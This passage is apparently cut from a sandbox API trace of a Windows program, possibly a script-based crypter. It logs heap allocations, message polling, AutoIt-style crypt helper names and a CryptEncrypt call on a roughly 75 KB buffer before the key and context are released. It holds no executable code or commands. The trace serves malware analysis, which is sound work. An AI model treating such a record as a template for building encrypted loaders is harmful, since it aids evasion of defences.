wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.255] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.255] CharLowerBuffW (in: lpsz="byte[75393]", cchLength=0xb | out: lpsz="byte[75393]") returned 0xb [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b4b0 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.255] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96c8 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b4b0 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76adc0 [0075.255] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.257] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.257] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.257] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0075.257] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0075.257] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.257] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.257] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.257] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.257] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.257] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.257] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb518 [0075.257] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.257] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0075.257] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0075.257] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.257] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0075.257] CryptEncrypt (in: hKey=0x6b8b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7dd398*, pdwDataLen=0x61e2d8*=0x1267f, dwBufLen=0x12680 | out: pbData=0x7dd398*, pdwDataLen=0x61e2d8*=0x12680) returned 1 [0075.258] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.258] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.258] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0075.258] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0075.258] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0075.258] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0075.258] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0075.258] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.258] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.258] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1090 [0075.258] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0075.258] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.258] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.258] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.258] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0075.258] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0075.258] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.258] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddb0 [0075.258] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96c8 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b4b0 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.259] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.259] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.259] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0075.259] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.259] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.259] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.259] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.259] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.259] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb418 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.259] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.259] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.259] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb438 [0075.259] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.259] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.260] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.260] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.260] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0075.260] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0d8 [0075.260] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.265] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.265] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.266] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1090 [0075.266] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.267] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.267] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.267] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0075.267] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e180 [0075.267] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.272] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.272] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.272] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.272] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.272] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0075.272] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.272] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0075.272] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.272] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0075.272] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0f0 [0075.272] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.272] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.272] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e378 [0075.272] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb558 [0075.272] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.272] PeekMessageW (in: lpMsg=0x61e4b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4b4) returned 0 [0075.273] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.273] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.273] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.273] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.273] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.273] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.273] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.273] CryptDestroyKey (hKey=0x6b8b78) returned 1 [0075.275] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0075.275] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0075.275] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0075.275] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.275] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6f0 [0075.275] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e630 [0075.275] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.275] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0075.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e330 [0075.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.276] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0075.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0075.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0075.277] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dae0 [0075.277] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.277] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.277] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.277] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0075.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.277] PeekMessageW (in: lpMsg=0x61e654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e654) returned 0 [0075.277] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4e8 [0075.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.277] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.277] PeekMessageW (in: lpMsg=0x61e48c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e48c) returned 0 [0075.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.277] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.277] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.278] PeekMessageW (in: lpMsg=0x61e8ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8ac) returned 0 [0075.278] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4e8 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb608 [0075.278] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.278] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0075.278] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.278] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.278] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.278] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.278] PeekMessageW (in: lpMsg=0x61e974, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e974) returned 0 [0075.278] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.278] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.278] PeekMessageW (in: lpMsg=0x61e7ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e7ac) returned 0 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0075.278] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0075.278] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0075.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0075.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.279] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.279] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.279] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5e8 [0075.279] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.279] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.279] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.279] CryptReleaseContext (hProv=0x696ad0, dwFlags=0x0) returned 1 [0075.279] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.279] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.279] PeekMessageW (in: lpMsg=0x61e79c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e79c) returned 0 [0075.279] FreeLibrary (hLibModule=0x77710000) returned 1 [0075.279] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.279] PeekMessageW (in: lpMsg=0x61ebcc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ebcc) returned 0 [0075.279] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.279] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.280] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.283] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, 